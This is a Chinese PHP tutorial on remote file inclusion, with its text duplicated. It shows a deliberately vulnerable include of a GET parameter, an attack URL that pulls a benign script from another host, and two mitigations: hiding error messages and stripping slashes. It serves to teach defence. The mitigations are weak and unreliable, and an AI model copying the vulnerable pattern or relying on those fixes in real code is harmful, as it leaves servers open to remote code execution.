PHP 網(wǎng)絡(luò)開發(fā)詳解之遠(yuǎn)程文件包含漏洞
更新時間:2010年04月25日 17:30:04 作者:
由于PHP支持使用相同的函數(shù)(Function)對本地文件和遠(yuǎn)程文件進(jìn)行操作。因此,一些惡意用戶通過強(qiáng)行使網(wǎng)站上的PHP代碼(Code)包含自己的文件來實(shí)現(xiàn)執(zhí)行自己腳本的目的。
以下代碼(Code)實(shí)現(xiàn)了根據(jù)瀏覽器地址欄參數(shù)的文件名稱包含不同文件的功能。
<?php
$file_name = $_GET["filename"]; //獲得當(dāng)前文件名
include("$file_name "); //包含文件
//一些其他操作
?>
這時,通過在地址欄上指定不同的文件名就可以實(shí)現(xiàn)包含不同文件并執(zhí)行的功能。例如,通過在瀏覽器上訪問http://localhost/test.php?filename=myinc.php就可以在代碼(Code)中包含并執(zhí)行myinc.php文件。
由于上面的代碼(Code)沒有進(jìn)行任何錯誤處理,在瀏覽器上不加參數(shù)運(yùn)行,所以將得到以下運(yùn)行結(jié)果。
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
訪問者通過讀取這段錯誤信息,可以得知當(dāng)前的操作是一個文件包含操作。這時,可以在自己的服務(wù)器上放置一個相應(yīng)的腳本代碼。需要注意的是PHP在獲取遠(yuǎn)程文件時獲得的是遠(yuǎn)程服務(wù)器的最終輸出結(jié)果,而不是文件本身。該腳本代碼位于192.168.0.1服務(wù)器上,文件名為hello.txt,腳本代碼(Code)如下所示。
<?php
echo "hello world!";
?>
這時,通過在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以運(yùn)行hello.txt中的腳本了。
為了解決這個問題,一種方式是完善代碼的錯誤信息,使訪問者無法知道當(dāng)前腳本正在包含參數(shù)中指定的文件。修改后的代碼(Code)如下所示。
<?php
$file_name = $_GET["filename"]; //獲得當(dāng)前文件名
if(!@include("$file_name.php")) //包含文件
{
die("頁面在瀏覽過程中出現(xiàn)錯誤");
}
//一些其他操作
?>
修改后,如果在被包含的文件無法找到時將出現(xiàn)“頁面在瀏覽過程中出現(xiàn)錯誤”的錯誤信息,訪問者將無法獲得當(dāng)前頁面的具體操作信息。
第二種方式可以更加有效地防止遠(yuǎn)程文件包含攻擊。方式是替換地址欄參數(shù)中的斜線“/”。這樣,在地址欄參數(shù)中輸入遠(yuǎn)程文件地址時,代碼將無法正確地獲得參數(shù)。修改后的代碼(Code)如下所示。
<?php
$file_name = str_replace('/', '', $_GET["filename"]); //獲得當(dāng)前文件名
if(!@include("$file_name.php")) //包含文件
{
die("頁面在瀏覽過程中出現(xiàn)錯誤");
}
//一些其他操作
?>
這樣,在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt 時,實(shí)際上PHP代碼(Code)獲得的包含文件名稱是http:192.168.0.1bugstest6_test。頁面將不會包含遠(yuǎn)程文件,并顯示相應(yīng)的錯誤信息。
復(fù)制代碼 代碼如下:
<?php
$file_name = $_GET["filename"]; //獲得當(dāng)前文件名
include("$file_name "); //包含文件
//一些其他操作
?>
這時,通過在地址欄上指定不同的文件名就可以實(shí)現(xiàn)包含不同文件并執(zhí)行的功能。例如,通過在瀏覽器上訪問http://localhost/test.php?filename=myinc.php就可以在代碼(Code)中包含并執(zhí)行myinc.php文件。
由于上面的代碼(Code)沒有進(jìn)行任何錯誤處理,在瀏覽器上不加參數(shù)運(yùn)行,所以將得到以下運(yùn)行結(jié)果。
Warning: include(.php) [function.include]: failed to open stream: No such file or directory in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
Warning: include() [function.include]: Failed opening '.php' for inclusion (include_path='.;C:\Program Files\xampp\php\pear\') in C:\Program Files\xampp\htdocs\Bugs\test6.php on line 3
訪問者通過讀取這段錯誤信息,可以得知當(dāng)前的操作是一個文件包含操作。這時,可以在自己的服務(wù)器上放置一個相應(yīng)的腳本代碼。需要注意的是PHP在獲取遠(yuǎn)程文件時獲得的是遠(yuǎn)程服務(wù)器的最終輸出結(jié)果,而不是文件本身。該腳本代碼位于192.168.0.1服務(wù)器上,文件名為hello.txt,腳本代碼(Code)如下所示。
復(fù)制代碼 代碼如下:
<?php
echo "hello world!";
?>
這時,通過在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt就可以運(yùn)行hello.txt中的腳本了。
為了解決這個問題,一種方式是完善代碼的錯誤信息,使訪問者無法知道當(dāng)前腳本正在包含參數(shù)中指定的文件。修改后的代碼(Code)如下所示。
復(fù)制代碼 代碼如下:
<?php
$file_name = $_GET["filename"]; //獲得當(dāng)前文件名
if(!@include("$file_name.php")) //包含文件
{
die("頁面在瀏覽過程中出現(xiàn)錯誤");
}
//一些其他操作
?>
修改后,如果在被包含的文件無法找到時將出現(xiàn)“頁面在瀏覽過程中出現(xiàn)錯誤”的錯誤信息,訪問者將無法獲得當(dāng)前頁面的具體操作信息。
第二種方式可以更加有效地防止遠(yuǎn)程文件包含攻擊。方式是替換地址欄參數(shù)中的斜線“/”。這樣,在地址欄參數(shù)中輸入遠(yuǎn)程文件地址時,代碼將無法正確地獲得參數(shù)。修改后的代碼(Code)如下所示。
復(fù)制代碼 代碼如下:
<?php
$file_name = str_replace('/', '', $_GET["filename"]); //獲得當(dāng)前文件名
if(!@include("$file_name.php")) //包含文件
{
die("頁面在瀏覽過程中出現(xiàn)錯誤");
}
//一些其他操作
?>
這樣,在瀏覽器中訪問http://localhost/test.php?filename=http://192.168.0.1/hello.txt 時,實(shí)際上PHP代碼(Code)獲得的包含文件名稱是http:192.168.0.1bugstest6_test。頁面將不會包含遠(yuǎn)程文件,并顯示相應(yīng)的錯誤信息。
相關(guān)文章
PHP foreach遍歷多維數(shù)組實(shí)現(xiàn)方式
這篇文章主要為大家詳細(xì)介紹了PHP foreach遍歷多維數(shù)組實(shí)現(xiàn)方式,具有一定的參考價值,感興趣的小伙伴們可以參考一下2016-11-11
php運(yùn)行提示:Fatal error Allowed memory size內(nèi)存不足的解決方法
這篇文章主要介紹了php運(yùn)行提示:Fatal error Allowed memory size內(nèi)存不足的解決方法,分別針對有服務(wù)器管理權(quán)限和沒有服務(wù)器管理權(quán)限的情況分析解決方法,是非常實(shí)用的技巧,需要的朋友可以參考下2014-12-12
php中\(zhòng)r \r\n \t的區(qū)別示例介紹
這篇文章主要介紹了php中\(zhòng)r \r\n \t的區(qū)別,需要的朋友可以參考下2014-02-02
PHP const定義常量及global定義全局常量實(shí)例解析
這篇文章主要介紹了PHP const定義常量及global定義全局常量實(shí)例解析,文中通過示例代碼介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價值,需要的朋友可以參考下2020-05-05
在mac?OS上進(jìn)行多個PHP版本之間切換的實(shí)現(xiàn)方法
不同項目使用php版本可能不同,需要安裝不同版本php,本文給大家介紹了在macOS上進(jìn)行多個?PHP?版本之間切換的實(shí)現(xiàn)方法,文中有詳細(xì)的代碼示例供大家參考,需要的朋友可以參考下2023-10-10
php比較多維數(shù)組中值的大小排序?qū)崿F(xiàn)代碼
php中根據(jù)數(shù)組的鍵(key)進(jìn)行比較,排序,有很多內(nèi)置函數(shù)可以輕松解決,如krsort(), ksort()等。如果是根據(jù)數(shù)組的值(value)進(jìn)行比較就麻煩一些2012-09-09
在所有的最簡單的程序中,大多數(shù)對象都有一個標(biāo)識,一個重要的商業(yè)應(yīng)用對象,例如一個Customer或者一個SKU,有一個或者更多的屬性---id,name,email地址,這樣可以把它從同一個類的其他實(shí)例區(qū)分開來。此外,對象有一個恒定的標(biāo)識:它是貫穿于整個應(yīng)用程序的一個唯一的標(biāo)識,對于程序員來說,”customer A”在任何地方就是”customer A”,并且只要你的程序在持續(xù)運(yùn)行時"customer A"仍然是"customer A"。 但是一個對象不需要有一個標(biāo)識。有些對象僅僅是為了描述其他對象的屬性。2008-04-04
PHP7.1實(shí)現(xiàn)的AES與RSA加密操作示例
這篇文章主要介紹了PHP7.1實(shí)現(xiàn)的AES與RSA加密操作,結(jié)合實(shí)例形式分析了php7.1環(huán)境下AES與RSA加密、解密操作相關(guān)實(shí)現(xiàn)與使用技巧,需要的朋友可以參考下2018-06-06

